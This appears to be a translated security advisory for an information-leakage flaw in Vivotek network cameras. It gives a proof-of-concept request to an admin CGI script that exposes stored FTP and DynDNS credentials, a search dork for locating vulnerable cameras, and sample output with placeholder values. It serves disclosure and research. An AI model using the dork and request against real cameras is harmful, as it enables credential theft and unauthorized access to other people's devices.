Release date:
Updated on:
Affected Systems:
Vivotek Network Cameras
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54476
Vivotek is a provider of Network Video Solutions.
Vivotek Network Camera has the information leakage vulnerability. After successful exploitation, attackers can access sensitive information remotely.
<* Source: GothicX
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
GothicX () provides the following test methods:
Exploit Title: Vivotek Full Data Source CONFIG
# Date: 09/07/12
# Author: Alejandro Leon Morales [GothicX]
# Author Mail: Gothicx [at] freaknetwork [dot] in
# Author Web: www. undermx. blogspot. mx
# Sofware web: www.vivotek.com
# Vulnerable version: all
# Tested on: Microsoft windows 7/Vista/XP/MacOS
# Dork: "/setup/config.html" | allinurl: "setup/parafile.html"
[PoC]
Http://www.example.com/cgi-bin/admin/getparam.cgi
[Info sensible]
ACCOUNT FTP
ACCOUNT DYNDNS
[Result]
Ddns_enable = '1'
Ddns_provider = 'dyndnsdynamic'
Ddns_Safe100_hostname =''
Ddns_Safe100_usernameemail =''
Ddns_Safe100_passwordkey =''
Ddns_DyndnsDynamic_hostname = 'hostname'
Ddns_DyndnsDynamic_usernameemail = 'usernameemail'
Ddns_DyndnsDynamic_passwordkey = 'passwordkey'
Ddns_DyndnsCustom_hostname =''
Ddns_DyndnsCustom_usernameemail =''
Ddns_DyndnsCustom_passwordkey =''
Ddns_TZO_hostname =''
Ddns_TZO_usernameemail =''
Ddns_TZO_passwordkey =''
Ddns_DHS_hostname =''
Ddns_DHS_usernameemail =''
Ddns_DHS_passwordkey =''
Ddns_DynInterfree_hostname =''
Ddns_DynInterfree_usernameemail =''
Ddns_DynInterfree_passwordkey =''
Ddns_CustomSafe100_hostname =''
Ddns_CustomSafe100_usernameemail =''
Ddns_CustomSafe100_passwordkey =''
Ddns_CustomSafe100_servername =''
Server_i0_type = 'ftp'
Server_i0_http_url = 'HTTP ://'
Server_i0_http_username =''
Server_i0_http_passwd =''
Server_i0_ftp_address = 'ftpaddress'
Server_i0_ftp_username = 'ftpusername'
Server_i0_ftp_passwd = 'ftppasswd'
Server_i0_ftp_port = '21'
Server_i0_ftp_passive = '1'
Server_i0_ftp_location = '\ temp \ record'
Bytes ----------------------------------------------------------------------------------------------------
[Sensitive data]
Ftp accounts: server_i0_ftp_address = 'ftpaddress'
Server_i0_ftp_username = 'ftpusername'
Server_i0_ftp_passwd = 'ftppasswd'
Dyndns accounts: ddns_DyndnsDynamic_hostname = 'hostname'
Ddns_DyndnsDynamic_usernameemail = 'usernameemail'
Ddns_DyndnsDynamic_passwordkey = 'passwordkey'
//************************************** **************************************** *******//
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Vivotek
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://ebdemo.8800.org: 17151/